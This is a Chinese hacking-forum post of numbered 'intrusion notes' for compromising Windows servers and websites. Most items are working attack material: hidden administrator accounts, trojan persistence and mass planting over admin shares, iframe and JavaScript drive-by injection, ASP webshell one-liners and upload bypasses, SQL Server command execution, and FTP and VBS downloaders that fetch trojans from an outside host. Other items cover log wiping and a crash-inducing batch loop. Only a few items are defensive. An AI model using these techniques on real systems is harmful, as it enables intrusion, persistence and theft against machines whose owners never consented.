中国网络渗透测试联盟

标题: 入侵渗透笔记 [打印本页]

作者: admin    时间: 2012-9-15 14:13
标题: 入侵渗透笔记
Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
9 m) ^+ j1 }' s. |- ncacls C:\windows\system32 /G hqw20:R) y% z7 @4 h4 P: D
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入0 u; v: F( y: X5 g& F0 I8 s
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
; H: Q! X) s* F5 B2 _. X1 T& e# M" L" G* u; p
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
  m4 Z/ b5 l* a3 b, g1 ]: \2 U  p; \, A& _3 h5 |
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
5 a$ o0 I' `7 Z  G$ n
4 ]8 j: G, F9 P- }& c) F4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号- o- c$ M- q, v5 G
2 K" n, s2 `- p0 ^: {  w1 J! o% F7 x2 t
5、利用INF文件来修改注册表  u2 X. S% H9 j/ y" Q/ \2 ]1 _
[Version]
2 F9 {; N: V+ kSignature="$CHICAGO$"
+ n0 k) ?" V) r1 p# Q' W) k% f[Defaultinstall]
  V2 Z; c% F( a0 g2 j3 h5 |addREG=Ating
6 e3 U: q9 E' m[Ating]7 v. i( y* l; h6 _, C
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
* t3 A- N7 E. Z/ J! _9 o- a8 c7 r以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:: Q) o; e) ^4 X8 L
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
( S0 a; r* @4 f5 s  }3 G其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU9 s* S+ S; \. h0 J2 z
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
: I: A. x( |0 `+ a- [; x1 eHKEY_CURRENT_CONFIG 简写为 HKCC
- J2 V" F. I/ Y4 c0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值& W, j! K" b# ?, z4 w
"1"这里代表是写入或删除注册表键值中的具体数据% V1 `& A* L. R; @' A

8 k' R* o- k0 S( g; T8 ?8 \$ K6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
9 @7 ~2 _7 }" Z; w% [9 ~# l3 P多了一步就是在防火墙里添加个端口,然后导出其键值
- \) B3 Q5 n7 n[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
7 }# W6 |1 I! B$ B& C/ W- m. b4 X% e% n
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽% }2 `# a& L+ l, e9 Q2 _2 {
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。( v' L7 s, n- l# E+ v  l' ~
- q3 R9 V' a3 w
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
: i4 ?' E8 `  a: a, x
$ M+ W4 J: f& u9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,  z, ^7 V4 V9 I
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。( o0 U6 X; ~. b! }2 H: {3 I1 ?
7 v! P: N' \; f4 j1 }% W/ R9 p
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
0 r# D% `, R2 ]4 p( r# ~$ b' [) [
% k# Z% G' z9 r, e$ W0 U11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,- j+ m2 \( k; J8 O
用法:xsniff –pass –hide –log pass.txt5 I! Q2 ?  k+ j
5 \/ M, `& D/ d/ D& o
12、google搜索的艺术, ~1 F2 T* [6 w# i
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
3 ~- R% Z6 I1 N5 ^# C) D或“字符串的语法错误”可以找到很多sql注入漏洞。
5 a  F; i# a$ I5 g% ~8 X0 |/ X3 E
5 M6 \0 h$ B! {13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。1 {3 M: A  r/ e$ E5 b" F

. B. ?4 E: n' J4 Z1 a+ q5 b14、cmd中输入 nc –vv –l –p 19878 U+ Q/ ]8 Z. O' i
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
6 ]; E5 t! x/ s, E, k4 ?: V( N  n9 a
% v( Q& G, l4 S% a0 Z15、制作T++木马,先写个ating.hta文件,内容为
9 D8 o7 l3 j& e8 D' |% _( t. E: S4 p<script language="VBScript">
# E2 d9 Q1 l- ~" Q: g. L' Kset wshshell=createobject ("wscript.shell" )5 {7 e3 A! C1 k6 @3 z
a=wshshell.run("你马的名称",1). P/ p5 D" C  |# \. Z* f, q7 W
window.close
) j5 j; n1 r0 D6 Y7 @+ L& A6 e$ Q</script>
' z( k& A; Y- a- Q再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。9 g: @5 _/ t# p
# D. k6 \( g: P" ?7 |; ~' A
16、搜索栏里输入
: a& W: V' u) B; Z6 U' C! L关键字%'and 1=1 and '%'='& l6 k; {- G: M* R- t5 \* D
关键字%'and 1=2 and '%'='
( M: V1 g' U' C! P比较不同处 可以作为注入的特征字符" A) H: T# w8 e0 @

8 ?" m, ^1 p& Q17、挂马代码<html>5 r" N2 e: H- {: ^# k8 s
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
0 d" Q: R1 K/ C  f</html>
5 c& x: t% u2 t; a" F* W3 L6 N3 u1 V# f0 I
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,  s/ R3 f! `0 q' n+ ~* l" w0 s7 ~
net localgroup administrators还是可以看出Guest是管理员来。: i( e; o+ I5 @# {

8 r: Y/ K+ T) z# _19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等: b  e2 g5 g, ^) j7 R7 z
用法: 安装: instsrv.exe 服务名称 路径" ~4 z% A  E( x2 T6 b0 W, c! D" I
卸载: instsrv.exe 服务名称 REMOVE. R2 ?2 L9 X. v# v" V* [) z& s/ l
6 R5 v2 R" k! G1 V) e7 K
# M$ z( }! L, h8 }8 A. R
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉0 ~7 @4 X$ }5 D
不能注入时要第一时间想到%5c暴库。
# z9 y6 \( s& _' r9 W1 k0 O7 ~, A6 A+ A- d) i9 U; t
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~1 B) {; P' C& c$ @) _

. v' O+ C- C' T23、缺少xp_cmdshell时* ^$ |" y/ a# B9 F# l
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'3 s- F3 g" Z! {0 q+ A- u
假如恢复不成功,可以尝试直接加用户(针对开3389的)
0 `# c7 O* |; ldeclare @o int
- _* [7 ^( Z5 p  Q0 x% z- Iexec sp_oacreate 'wscript.shell',@o out+ b# U5 ]4 {! B
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
; N7 f+ c% W6 D8 {7 C+ I! t, x5 ?2 u# u- h& Q* A
24.批量种植木马.bat1 m% ^! D4 x" s1 B8 G( g
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
- ]- v9 _" T5 A( Z2 v* H2 ffor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间' X2 t+ ]* ~. P+ ]9 o- X* E$ A
扫描地址.txt里每个主机名一行 用\\开头
# C1 B7 X5 N6 y: g3 P. }9 H5 I$ s) V3 u) q
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。! s0 I" N) Y. A  o" T* }2 I) D

# P8 _' j* e9 Y5 g9 r. |26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
  u- E: U; S* f) W% S将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
; `$ k6 p) f8 a- m" H.cer 等后缀的文件夹下都可以运行任何后缀的asp木马& _: c* `* p( V( ^* P( y- g
& J& {9 O/ W( `7 b7 ?' I* y3 Q
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP  J2 }  p9 w( Z9 x% a, q
然后用#clear logg和#clear line vty *删除日志' K0 {  X' V( {0 X; U  p* I

$ L. ], Z+ ~4 q) d% l6 L! p0 ^28、电脑坏了省去重新安装系统的方法
1 I% R0 F# x+ V; F纯dos下执行,
: Q- U/ r4 J$ M9 Pxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
& F8 k& |& A, [& z* u# i2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
2 x  Q% }% G* C% Y; G9 g! ~% K1 G5 k" z- h( z1 K2 E/ M
29、解决TCP/IP筛选 在注册表里有三处,分别是:
, ]9 a& W, U: e( _% T, K8 cHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
5 `2 w0 D7 i' yHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip/ A+ w( s9 {' c8 F& M
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip5 w, D% u' C4 @1 h1 g( d3 p* l
分别用
/ k, O- I: V; C% H# q# qregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip7 [6 H+ H/ C& `$ C) S
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
( w4 B6 }$ S  o* r8 r' Sregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip1 G( w6 E( O6 \8 A$ m/ l& n5 {
命令来导出注册表项
- d" _$ f6 P6 \5 J! j7 [然后把三个文件里的EnableSecurityFilters"=dword:00000001,+ c3 y) C; k5 y8 f( i6 i. M( F
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用/ K- X) Y) v4 W% C/ j6 \
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。( P+ u4 a1 c# I5 P' U$ V/ T

' [$ U1 U4 O5 T30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
( E6 q! [  l/ t7 G9 W; QSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
7 i) Y! `  U" l+ W2 I1 K) z( h- i& @0 D" e  \, B
31、全手工打造开3389工具  F9 W1 f( S  t" L
打开记事本,编辑内容如下:
" f. T: c% Q# Qecho [Components] > c:\sql  j  _+ B; n5 }# ?' k6 r# s
echo TSEnable = on >> c:\sql
( Q$ e( y1 y) ~7 L* v7 @sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q3 r; o+ U% Y: p- n6 Z
编辑好后存为BAT文件,上传至肉鸡,执行& y6 P# n7 e4 u! U3 T) X
' Z! L) j& I3 S6 B! K
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马  v/ g+ `5 |8 _
6 F8 E& d4 }, f, H% c
33、让服务器重启
1 @3 K9 i( r) E" I8 X& W写个bat死循环:, \( V" d8 A  e+ W/ g, J! h+ w
@echo off
" n4 D6 M  l) ]:loop1
$ a; V* A9 T" W. t  @1 Y  wcls
4 N+ C9 L! y: G$ V6 Vstart cmd.exe
9 D# H1 h+ |$ q1 d( p: x9 m. pgoto loop1* |' M2 {# v1 ?8 t
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启# q& {4 C) Z( m! K5 o
: z8 K  [" S" [! n
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
4 b  t- {' T: n6 k, i5 H$ z@echo off
! Z7 f$ ]4 f* F! `: J7 Kdate /t >c:/3389.txt4 e) t- U  `9 @* w$ T6 d
time /t >>c:/3389.txt: n' f' j0 |! \7 {0 \. [5 a  x
attrib +s +h c:/3389.bat1 ~+ k  N( c4 S$ @
attrib +s +h c:/3389.txt
2 o- i! D! g4 i6 z: V6 I6 Anetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt: N9 E+ V( G- k" `0 Q* h* |# H, i
并保存为3389.bat
3 _# O! o5 |7 M, U打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
) q: R! b+ ~2 O8 u
3 e0 a9 }5 u9 [: k( t" k$ f7 _35、有时候提不了权限的话,试试这个命令,在命令行里输入:2 r7 x9 V' j6 V/ E  {' E3 B
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
% _8 y9 C# R( Y输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。% c1 e: r: s/ A4 u) M- f

7 M6 m# O6 r8 K3 S5 A# D36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件1 M5 A/ @- H; \5 W4 _0 M- X
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址9 H, z9 `8 q6 e0 p: {5 p$ L  R; X
echo 你的FTP账号 >>c:\1.bat //输入账号
1 w9 r/ B9 o% \$ n$ m4 m, u5 Qecho 你的FTP密码 >>c:\1.bat //输入密码1 C. S( \' x, z+ {9 M( d4 f  B8 L
echo bin >>c:\1.bat //登入
6 j8 Q1 S, G. z& n3 B! hecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么$ I" A9 j* Z, Y; R; [
echo bye >>c:\1.bat //退出
/ ?$ y8 H: m$ {+ r) C/ R6 A然后执行ftp -s:c:\1.bat即可7 h9 \; E4 ]: v* F9 V* s

# `0 W; E1 R2 B' j' d, W- @37、修改注册表开3389两法
6 Y( Z% ]9 t, Z: x  ](1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表( F0 i2 Y: C9 D8 N; p+ w
echo Windows Registry Editor Version 5.00 >>3389.reg" ~) _% z. `" z8 X" ~5 f; `
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
9 |0 h% v6 O- R0 u( K. e$ s1 decho "Enabled"="0" >>3389.reg8 p3 w% U$ c% K0 y5 ?
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
& r5 L+ z, E- o+ INT\CurrentVersion\Winlogon] >>3389.reg5 S3 f- Y% z* O4 Y% A
echo "ShutdownWithoutLogon"="0" >>3389.reg
# p' p! f0 a4 D/ p8 G- secho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer], }9 U; z3 O2 f( A  j8 E2 d
>>3389.reg9 N2 N+ i( i3 a3 r
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
+ c0 H7 [$ q* u2 J8 g/ J$ O$ d! wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
: C$ G: h1 f4 b0 x* ~>>3389.reg$ G5 C* J# M" c3 q' k* u3 k
echo "TSEnabled"=dword:00000001 >>3389.reg
$ }& Q1 d  }; e+ S- techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
  J- E, L* y: X! mecho "Start"=dword:00000002 >>3389.reg
; T+ A# y; L; H. W4 oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]  }- ?/ n8 a* D# t
>>3389.reg7 Z" a, o5 B5 B1 n4 b
echo "Start"=dword:00000002 >>3389.reg
3 a3 C' W& k! a- x1 i6 i+ }echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg6 U) V- Y8 z  O8 ?4 i; d/ Y' r
echo "Hotkey"="1" >>3389.reg3 d7 x- Y% v+ P& B7 t3 c
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal7 k, r+ B8 ^1 b$ G
Server\Wds\rdpwd\Tds\tcp] >>3389.reg5 X7 p( p+ U; P' c* G$ [% A
echo "PortNumber"=dword:00000D3D >>3389.reg
% k* U: I1 j. pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
( B& ?8 n7 j: q4 @( W: bServer\WinStations\RDP-Tcp] >>3389.reg
% K4 z7 w& Q) vecho "PortNumber"=dword:00000D3D >>3389.reg  {; B8 H! v5 M& i9 l/ M; L
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。/ ^5 Y$ H4 k6 U9 d1 u+ j$ G
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)- Y, W2 P3 C$ \- r
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效( m+ K- L' ?0 L8 F3 N
(2)winxp和win2003终端开启4 C! q* h0 D" l9 t. F8 ]
用以下ECHO代码写一个REG文件:
  Z5 ]; x2 P& d+ ]' y4 Becho Windows Registry Editor Version 5.00>>3389.reg7 m# A- p, Y; s1 E. e$ v
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal# i, r- I) |1 \( o; ?
Server]>>3389.reg9 E* _7 V9 S& X& F
echo "fDenyTSConnections"=dword:00000000>>3389.reg/ {6 x( S% @) p, h! b: s, ?8 T8 b* `1 \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal* I7 q$ _0 U( a. h- e
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
$ ?/ d2 Y4 L& c: G1 c- R8 J6 mecho "PortNumber"=dword:00000d3d>>3389.reg5 p1 C2 ~* z" o1 Z+ |
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- V- P6 V3 {  m# e/ h  W+ lServer\WinStations\RDP-Tcp]>>3389.reg+ ^" ~3 U. }3 V: Y2 B& C
echo "PortNumber"=dword:00000d3d>>3389.reg. F- q$ j/ O1 O( y+ O. S
然后regedit /s 3389.reg del 3389.reg
$ v3 o2 N  c8 F) S6 w  dXP下不论开终端还是改终端端口都不需重启+ v% e" X+ T6 l, Q. y2 w

: c: ]8 G/ I2 O+ R* ^8 y. K4 r38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
& `2 `' m* U& c. [5 c3 ~用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
9 L; u. d+ d; R2 C' t
$ j: |9 J1 f, c  l7 P5 j  h8 X% R39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!2 X" H- e$ X3 S* y
(1)数据库文件名应复杂并要有特殊字符
6 a8 W9 w" f3 l$ M( i(2)不要把数据库名称写在conn.asp里,要用ODBC数据源* g% c$ S8 |/ Q6 c7 l0 r* t  f
将conn.asp文档中的
; c$ z5 Q6 r* F. P. mDBPath = Server.MapPath("数据库.mdb"), z7 c: X+ i/ z3 B5 q; s
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
0 t; m( w0 a0 U+ J
5 Y9 {! w% A1 G1 H2 Y0 e# W修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
4 D; s: C+ h6 s' l& F! _(3)不放在WEB目录里
2 A/ e, r; n0 ~6 [  G6 e5 F. O% k0 E& O3 w$ e, F% S
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉. `' ^% ]2 }; }- J: x
可以写两个bat文件  c+ c3 e+ m8 I, [) F
@echo off
2 F4 h4 j) r( B; `) _$ [@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
! z  R2 A, \8 G' A7 G) d@del c:\winnt\system32\query.exe( p' l; L& ]( P
@del %SYSTEMROOT%\system32\dllcache\query.exe
8 ~4 A4 I8 x* c@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
8 ~' ?+ L3 K" e* V2 c4 R
5 c( B* p% D: h! D  s@echo off/ R/ f1 z- ]/ d) y# x- C: F& z
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
9 t3 `% t* m- W% v3 k# z@del c:\winnt\system32\tsadmin.exe
2 U0 _/ Y' l& H9 t: W7 z@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
! q6 B- L: U' y
/ b9 X* A" N/ ^# L41、映射对方盘符* u; T' f) S/ T4 d; d% F: j
telnet到他的机器上,
$ W& w5 k1 X. E) Hnet share 查看有没有默认共享 如果没有,那么就接着运行
% g. I: d2 l4 ^; _net share c$=c:; Y' g$ y7 J. _
net share现在有c$
2 e$ X  a) f5 J* h: _% V& N在自己的机器上运行  [# D+ |( B2 _" A- g5 _
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K# o6 N- ~6 ]4 E9 r1 O) z% F

6 v  a$ j) p  V8 l42、一些很有用的老知识
+ z% |: ^9 p; o- r, C0 h5 W5 Wtype c:\boot.ini ( 查看系统版本 )3 J& L) s" l" n2 {$ a" ~2 Q
net start (查看已经启动的服务)
# C& w! |; f5 J$ y. m2 equery user ( 查看当前终端连接 )
& O0 @% C6 u: }. ^4 C/ Mnet user ( 查看当前用户 )- N1 s# h9 i$ l/ ?
net user 用户 密码/add ( 建立账号 )! B! E  g7 F: Y( m" S) c6 p
net localgroup administrators 用户 /add (提升某用户为管理员)# G: S' V% J0 i- D. U/ ^1 w7 c
ipconfig -all ( 查看IP什么的 )
3 o- T- V) q* z0 [  N+ anetstat -an ( 查看当前网络状态 )1 d/ \/ P8 D0 l- ~; P7 T. s
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)/ M8 n3 C' j# E6 a
克隆时Administrator对应1F4
" Y' H1 a! K8 W) xguest对应1F5
$ f, Q* k7 h* P3 @& ytsinternetuser对应3E87 c) _1 l+ G* c& g

7 X4 h0 u$ s5 \/ Q( U2 Z43、如果对方没开3389,但是装了Remote Administrator Service% v9 v' ?6 k7 g" i: B
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接5 m7 I4 n& z8 s" L; E2 E
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
3 A7 j& K: M; }" h9 W+ t先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"0 R! z* O# t+ f5 _* h
# P; T  U, `5 s( E( O$ i
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
( }$ W0 \. V% D2 z5 O2 O本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)$ f! j& N4 x) U

0 N# S3 Z# e& e  d8 s/ C3 U45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)! @* q% H5 v  i4 j
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open& b% q) l( e+ @
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
$ H" o' o' L/ DCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
0 R0 s9 b( n+ d4 R1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs+ R# h" q; L& h
(这是完整的一句话,其中没有换行符)
: v5 @3 C: n1 W' b9 ^5 Z然后下载:
( I4 `6 N$ l8 @# p+ wcscript down.vbs http://www.hack520.org/hack.exe hack.exe7 f$ d* G/ X+ @0 e* t+ M

+ O( w  ~6 v: w46、一句话木马成功依赖于两个条件:/ r8 X5 L& M+ |
1、服务端没有禁止adodb.Stream或FSO组件$ A4 P" i1 a" {
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。6 D0 Q  ?' F9 B/ {8 k2 r0 @

  E9 f& u) X- X8 u2 Q; f47、利用DB_OWNER权限进行手工备份一句话木马的代码:
' y+ q/ V" Y# F4 r' c;alter database utsz set RECOVERY FULL--7 l- D" E( H2 u4 c) k3 n
;create table cmd (a image)--/ @5 H6 s+ F/ Q0 W, N( i) k
;backup log utsz to disk = 'D:\cmd' with init--
: X: i' N9 K' N; h+ F;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--7 D. s8 E/ W- M/ `/ {0 p* C
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--' b4 v0 p. |. u6 {
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
$ C  W  e6 {6 e5 c9 Y4 I7 O6 t
* g6 n" E0 }7 u4 T$ @# F  L# `48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
" d# {, r$ L9 h3 T9 z
! U  @! T/ n8 n5 b. k7 q' Y5 y用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options2 S) w  i6 ?5 F( X3 I" U
所有会话用 'all'。
( s2 u; Y% B; L# i4 w. V-s sessionid 列出会话的信息。# U, e5 N  v3 X6 [' A, L
-k sessionid 终止会话。
! @4 }1 S  ^& a. f3 ~-m sessionid 发送消息到会话。
& U. x7 y) Y! \/ g; S# H
% w' y0 y- v8 X4 }, yconfig 配置 telnet 服务器参数。
2 F  x2 z) N5 B- V- @' _: c# g
) ^. a4 q. v+ e" xcommon_options 为:/ D6 @# L  n1 Z3 E+ \5 E, W
-u user 指定要使用其凭据的用户
5 a+ A2 ^- b, U, p9 b- ]-p password 用户密码
6 h$ w# ^- G6 x: k0 [
/ N9 @  B6 y# w& I9 \: xconfig_options 为:# C4 d3 O8 D6 j* s- t/ F
dom = domain 设定用户的默认域& x3 a8 `6 X% e/ r
ctrlakeymap = yes|no 设定 ALT 键的映射: a, _" R; @- l8 n7 M
timeout = hh:mm:ss 设定空闲会话超时值
) z2 Z( r1 j/ Z6 e0 Etimeoutactive = yes|no 启用空闲会话。
, Y4 y6 d! ]: C& A# Imaxfail = attempts 设定断开前失败的登录企图数。
; R6 z; \4 }6 W* U' q/ {maxconn = connections 设定最大连接数。
1 R  n/ p* S2 ^, Jport = number 设定 telnet 端口。- }' m6 N7 E. _: F0 Z
sec = [+/-]NTLM [+/-]passwd
. I$ @% i/ d! ]9 T) Q- m设定身份验证机构
" i$ \4 \' s: [5 q3 xfname = file 指定审计文件名。
6 H) ?! \1 T2 v6 V* X* Wfsize = size 指定审计文件的最大尺寸(MB)。
) Q% Z, m9 V, G8 nmode = console|stream 指定操作模式。
2 l  D( m2 `8 z4 W0 \9 iauditlocation = eventlog|file|both
1 P( \6 k& Q6 c/ I& Q# Y指定记录地点
6 z& z3 N8 D6 a# Faudit = [+/-]user [+/-]fail [+/-]admin2 N0 H2 K/ L. Z4 a

# M; R) P$ R' N! c+ |49、例如:在IE上访问:
1 m3 _% f& U# N: awww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
/ `( y& v4 w/ `hack.txt里面的代码是:7 {/ \3 {! ~, g3 E7 m1 }! B
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">( W% i1 I' N' k; G
把这个hack.txt发到你空间就可以了!
- n. ]/ p: v( h8 F这个可以利用来做网马哦!, G- ^8 u: f5 y6 }: D) H
+ Y/ I; z7 O5 l% z  `) k- o
50、autorun的病毒可以通过手动限制!- U* z- I8 n( A8 C
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!" s- U) ?4 @0 E0 ~
2,打开盘符用右键打开!切忌双击盘符~0 p8 U& g$ M9 u2 p& ]
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!* ?* i7 s  N0 U2 x

# `* L6 \  _' D" ~! ~$ n51、log备份时的一句话木马:5 B, I- a8 ]/ s% j2 n* z) [# w
a).<%%25Execute(request("go"))%%25>
# Y( ]5 k& c6 V( }b).<%Execute(request("go"))%>
0 a+ o% m, t7 u& [! T7 bc).%><%execute request("go")%><%$ V- u  K* D" R7 y" d, {7 m
d).<script language=VBScript runat=server>execute request("sb")</Script>" S% g$ |, K) Z: A5 C" f2 ?
e).<%25Execute(request("l"))%25>
( j& b2 L4 c5 C/ c+ u! Ff).<%if request("cmd")<>"" then execute request("pass")%>
/ u, M) F. b! s% f
! w3 k& t" Z0 J- Z, ~! K8 |! K52、at "12:17" /interactive cmd5 s1 j' K) ^0 g8 Q+ T! B
执行后可以用AT命令查看新加的任务
